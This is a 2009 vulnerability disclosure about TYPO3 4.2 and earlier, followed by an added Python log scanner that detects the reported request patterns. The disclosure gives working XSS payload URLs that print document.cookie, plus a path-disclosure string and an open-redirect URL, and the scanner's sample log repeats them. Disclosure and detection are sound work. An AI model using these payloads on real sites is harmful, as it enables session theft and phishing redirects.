Computer Security
[EN] securityvulns.ru

From: MustLive <mustlive_(at)_websecurity.com.ua>
Date: 04.12.2009
Subject: Vulnerabilities in TYPO3

Hello 3APA3A!

I want to warn you about security vulnerabilities in TYPO3.

These are Cross-Site Scripting, Full path disclosure and Redirector vulnerabilities.

XSS:

http://site/index.php?id=49&sword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/nc/search-result/start/1.html?tx_ttproducts_pi1%5Bsword%5D=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure:

http://site/index.php?jumpurl=%0A1

Redirector:

http://site/index.php?jumpurl=http://websecurity.com.ua

Vulnerable are TYPO3 4.2 and previous versions.

I mentioned these vulnerabilities on my site (http://websecurity.com.ua/3558/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
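
A defender-side check for the request patterns listed in the message above, as an added example that is not part of the original message or of TYPO3: it scans web-server access-log lines for markup in `sword` parameters and for `jumpurl` values that carry control characters or point off-site. The log lines, the `OWN_HOSTS` allowlist and the finding names are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

OWN_HOSTS = {"site"}   # assumption: hosts this site may redirect to
MARKUP = set('<>"')    # characters that break out of an HTML attribute
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target, own_hosts=OWN_HOSTS):
    """Return the advisory patterns present in one request target."""
    found = set()
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name == "sword" or name.endswith("[sword]"):  # plain or extension-scoped
            if MARKUP & set(value):
                found.add("markup-in-sword")
        elif name == "jumpurl":
            if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
                found.add("control-char-in-jumpurl")
            try:
                host = urlsplit(value).hostname
            except ValueError:  # malformed authority: treat as off-site
                host = "<unparseable>"
            if host is not None and host not in own_hosts:
                found.add("offsite-jumpurl")
    return found

def scan(lines, own_hosts=OWN_HOSTS):
    """Return (line_number, sorted findings) for each log line that matches."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        found = classify(match.group(1), own_hosts) if match else set()
        if found:
            hits.append((number, sorted(found)))
    return hits

# Constructed log lines (not real traffic); targets follow the advisory's URLs.
LINE = '198.51.100.7 - - [04/Dec/2009:10:00:00 +0000] "GET {} HTTP/1.1" 200 512'
PAYLOAD = "%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E"
SAMPLE_LOG = [LINE.format(t) for t in (
    "/index.php?id=49&sword=typo3",                  # benign search
    "/index.php?id=49&sword=" + PAYLOAD,
    "/nc/search-result/start/1.html?tx_ttproducts_pi1%5Bsword%5D=" + PAYLOAD,
    "/index.php?jumpurl=%0A1",
    "/index.php?jumpurl=http://websecurity.com.ua",
    "/index.php?jumpurl=http://site/",               # on-site redirect
)]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```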
